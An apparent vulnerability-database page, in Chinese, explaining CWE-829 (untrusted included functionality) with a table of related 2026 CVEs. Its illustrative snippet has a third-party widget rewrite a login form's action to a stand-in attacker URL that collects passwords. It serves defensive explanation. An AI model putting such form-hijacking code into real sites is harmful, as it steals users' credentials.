CWE-829 从非可信控制范围包含功能例程 类弱点 109 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-829 属于不信任源引入漏洞,指软件从非预期控制域导入可执行功能或库。攻击者常通过篡改第三方依赖或供应链,注入恶意代码以执行任意操作,从而破坏系统完整性。开发者应严格验证所有外部组件的来源与完整性,仅集成受信任且经过安全审计的库,并实施最小权限原则,确保仅加载符合预期的功能模块,以阻断不可信代码的执行路径。
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2026-43571 | OpenClaw 2026.4.10 前通道设置阴影解析漏洞 — OpenClaw | 8.8 | High | 2026-05-05 |
| CVE-2026-43569 | OpenClaw < 2026.4.9 工作区提供商认证漏洞 — OpenClaw | 8.8 | High | 2026-05-05 |
| CVE-2026-43003 | OpenStack Ironic Python Agent 1.0-11.5 远程代码执行漏洞 — ironic-python-agent | 8.0 | High | 2026-05-01 |
| CVE-2026-41396 | OpenClaw 安全漏洞 — OpenClaw | 7.8 | High | 2026-04-28 |
| CVE-2026-42510 | OpenStack Ironic 安全漏洞 — Ironic | 6.6 | Medium | 2026-04-28 |
| CVE-2026-41355 | OpenClaw 安全漏洞 — OpenClaw | 7.3 | High | 2026-04-23 |
| CVE-2026-41336 | OpenClaw 安全漏洞 — OpenClaw | 7.8 | High | 2026-04-23 |
| CVE-2026-6859 | Red Hat Enterprise Linux AI 安全漏洞 — Red Hat Enterprise Linux AI (RHEL AI) 3 | 8.8 | High | 2026-04-22 |
| CVE-2026-40903 | goshs 安全漏洞 — goshs | 9.1 | Critical | 2026-04-21 |
| CVE-2026-41295 | OpenClaw 安全漏洞 — OpenClaw | 7.8 | High | 2026-04-20 |
| CVE-2026-41253 | iTerm2 安全漏洞 — iTerm2 | 6.9 | Medium | 2026-04-18 |
| CVE-2026-6482 | Rapid7 Insight Agent 安全漏洞 — Insight Agent | 7.8AI | HighAI | 2026-04-17 |
| CVE-2026-40959 | Luanti 安全漏洞 — Luanti | 9.3 | Critical | 2026-04-16 |
| CVE-2026-40313 | PraisonAI 安全漏洞 — PraisonAI | 9.1 | Critical | 2026-04-14 |
| CVE-2026-40154 | PraisonAI 安全漏洞 — PraisonAI | 9.3 | Critical | 2026-04-09 |
| CVE-2026-1342 | IBM多款产品 安全漏洞 — Verify Identity Access Container | 8.5 | High | 2026-04-07 |
| CVE-2026-32920 | OpenClaw 安全漏洞 — OpenClaw | 8.4 | High | 2026-03-31 |
| CVE-2026-3991 | Broadcom Symantec Data Loss Prevention Windows Endpoint 安全漏洞 — Data Loss Prevention | 7.8 | High | 2026-03-30 |
| CVE-2025-55273 | HCL Aftermarket DPC 安全漏洞 — Aftermarket DPC | 4.3 | Medium | 2026-03-26 |
| CVE-2026-22217 | OpenClaw 安全漏洞 — OpenClaw | 6.1 | Medium | 2026-03-18 |
| CVE-2026-4295 | Kiro IDE 安全漏洞 — Kiro IDE | 7.8 | High | 2026-03-17 |
| CVE-2026-4255 | Thermalright TR-VISION HOME 安全漏洞 — TR-VISION HOME | 7.8AI | HighAI | 2026-03-16 |
| CVE-2026-28135 | WordPress plugin Royal Elementor Addons 安全漏洞 — Royal Elementor Addons | 8.2 | High | 2026-03-05 |
| CVE-2026-1628 | Mattermost Desktop App 安全漏洞 — Mattermost | 4.6 | Medium | 2026-03-02 |
| CVE-2026-28372 | GNU Inetutils 安全漏洞 — inetutils | 7.4 | High | 2026-02-27 |
| CVE-2026-27941 | OpenLIT 安全漏洞 — openlit | 10.0 | Critical | 2026-02-26 |
| CVE-2026-26974 | Slyde 安全漏洞 — Slyde | 9.8AI | CriticalAI | 2026-02-20 |
| CVE-2026-26959 | ADB Explorer 安全漏洞 — ADB-Explorer | 7.8 | High | 2026-02-19 |
| CVE-2026-26079 | Roundcube Webmail 安全漏洞 — Webmail | 4.7 | Medium | 2026-02-11 |
| CVE-2026-1699 | Eclipse Theia - Website 安全漏洞 — Eclipse Theia - Website | 10.0 | Critical | 2026-01-30 |
CWE-829(从非可信控制范围包含功能例程) 是常见的弱点类别,本平台收录该类弱点关联的 109 条 CVE 漏洞。